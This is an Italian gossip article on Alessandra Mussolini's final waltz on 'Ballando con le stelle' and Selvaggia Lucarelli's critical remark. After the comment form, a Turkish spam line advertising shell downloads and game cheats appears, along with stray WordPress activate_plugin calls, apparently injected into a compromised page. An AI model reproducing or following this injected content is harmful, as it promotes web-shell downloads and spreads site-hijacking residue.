Ballando con le stelle, Alessandra Mussolini incanta la giuria ma non la Lucarelli: “Peron ti ha girato come una lampadina”



Gioie e dolori per Alessandra Mussolini in questo percorso a Ballando con le stelle. Prima dell’esibizione in finale su Rai1 sabato 21 novembre, l’ex parlamentare ha appunto tracciato un bilancio – non senza momenti commoventi – della sua partecipazione al programma di Milly Carlucci, tra le polemiche con la giuria (su tutti Selvaggia Lucarelli e Alessandro Canino), qualche suo eccesso e comunque delle ottime performance.

 

 

In finale ha dovuto fare a meno del suo partner Maykel Fonts (positivo al Covid e collegato da casa), sostituito da Samuel Peron. E Alessandra Mussolini non si è scoraggiata, dando vita a un valzer che ha fatto il pieno di applausi. “Meraviglioso”, ha affermato Carolyn Smith. D’accordo anche Guillermo Mariotto, mentre Selvaggia Lucarelli ci è andata giù pesante: “Hai regalato molto di te e questo è da apprezzare, ma finché Samuel Peron non ti ha girato come una lampadina, non ho visto un valzer fenomenale”. Scoppia il caos, ma in generale l’esibizione viene apprezzata.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );